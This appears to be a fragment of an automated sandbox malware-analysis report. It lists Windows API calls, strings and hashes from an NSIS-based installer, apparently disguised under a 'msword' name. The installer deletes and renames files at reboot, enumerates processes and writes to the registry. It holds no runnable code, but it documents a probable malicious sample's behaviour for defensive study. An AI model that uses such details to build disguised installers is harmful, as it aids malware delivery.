                                                                            • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                              • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                              • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                              • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                            • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                            • String ID: 82D$@%F$@rD$A
                                                                            • API String ID: 3347642858-1086125096
                                                                            • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                            • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                            Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                            • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                            • API String ID: 1916479912-1189179171
                                                                            • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                            • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                            Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                            • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                            • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                            • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                            • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                            • FindClose.KERNEL32(?), ref: 00406E33
                                                                            Strings
                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                            • \*.*, xrefs: 00406D03
                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                            • API String ID: 2035342205-3294556389
                                                                            • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                            • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                            Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                            • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                            • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                            • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 3581403547-784952888
                                                                            • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                            • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                            Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                            Strings
                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                            • API String ID: 542301482-1377821865
                                                                            • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                            • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                            Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                            • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                            Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                            • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                            • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                              • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                            • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                            • API String ID: 20674999-2124804629
                                                                            • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                            • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                            Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                            • GetSysColor.USER32(?), ref: 004041AF
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                            • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                              • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                            • SendMessageW.USER32(00000000), ref: 00404251
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                            • SetCursor.USER32(00000000), ref: 004042D2
                                                                            • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                            • SetCursor.USER32(00000000), ref: 004042F6
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                            • String ID: @%F$N$open
                                                                            • API String ID: 3928313111-3849437375
                                                                            • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                            • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                            Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                            • wsprintfA.USER32 ref: 00406B4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                            • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                            • String ID: F$%s=%s$NUL$[Rename]
                                                                            • API String ID: 565278875-1653569448
                                                                            • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                            • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                            • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                            • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                            Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                            • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
